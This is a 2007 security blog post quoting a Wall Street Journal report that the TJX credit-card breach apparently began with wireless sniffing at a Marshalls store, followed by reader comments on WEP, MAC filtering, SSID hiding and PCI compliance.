TJX breach may have started with wireless access
May 8th, 2007 by chitchcock Posted in Credit Card Fraud, Merchant, Third-Parties, Wireless
The WSJ reports:
“The biggest known theft of credit-card numbers in history began two summers ago outside a Marshalls discount clothing store near St. Paul, Minn.
There, investigators now believe, hackers pointed a telescope-shaped antenna toward the store and used a laptop computer to decode data streaming through the air between hand-held price-checking devices, cash registers and the store’s computers. That helped them hack into the central database of Marshalls’ parent, TJX Cos. in Framingham, Mass., to repeatedly purloin information about customers.
The $17.4-billion retailer’s wireless network had less security than many people have on their home networks, and for 18 months the …”
More information here and here.
![[del.icio.us]](http://images.del.icio.us/static/img/delicious.small.gif){kind=small}
6 Responses to “TJX breach may have started with wireless access”
By Rob Newby on May 8, 2007
I’ve mentioned this on my own blog, but apparently they were using WEP encryption, without MAC filters and broadcasting their SSID.
Mike Rothman commented that as the attack had been going on for 4 years, this level of security wasn’t really surprising. What this really illustrates is how hard it is to a) communicate inside vast organisations, and therefore b) get a security program moving quickly.
PCI deadlines are pretty close now, and apparently only 3% of retailers are compliant. Awareness of PCI is at an all time high however.
We can all learn from this the length of time it takes to communicate such an idea and for it to reach the right people.
By arkan on May 8, 2007
What is more outrageous than the fact that a few TJX stores ran WEP (they were supposedly in the process of upgrading to WPA) is the fact that once on the store network, the attackers were free to roam the internal corporate network unnoticed for years. In short order, they made their way to the main (load-balanced) payment switch, allowing them to capture transaction data, again, for years.
Systems accounts were added, large files were transfer via FTP out all under the not-so watchful eyes of TJX IT.
By chitchcock on May 11, 2007
—–[snip]—–
without MAC filters and broadcasting their SSID
—–[/snip]—–
While I agree with you on the WEP issue, I don’t really fault them for a lack of MAC filtering or for broadcasting their SSID. Both are known to be horrible security measures as both are sent in the clear, regardless of encryption. Since they were already *doing* wireless sniffing, they just had to sit there and wait for a client to connect.
MAC filtering and SSID stealthing are really more trouble than they’re worth. Maintaining MAC lists in particular is a huge pain and detrimentally affects usability far more than it provides in security.
By Rob Newby on May 12, 2007
OK, fair point. MAC filtering is probably redundant at this scale of operations, but I would have thought hiding SSIDs was a minimum effort thing to do. My understanding of events was that the SSID had been picked up by wardriving in the first place, and then they’d set to work cracking the WEP key. Either way, using a wireless network connected to anything which has access to your customer records is pretty dumb.
By chitchcock on May 12, 2007
—–[snip]—–
Either way, using a wireless network connected to anything which has access to your customer records is pretty dumb.
—–[/snip]—–
Agreed…it’s funny that you should mention that. Even the otherwise minimalist Wiki page for PCI DSS mentions some WiFi security measures. I guess they missed that. :/
By Declan Mansfield on Aug 19, 2007
I forgot to mention –i am from Ireland where Freestar has its Main Office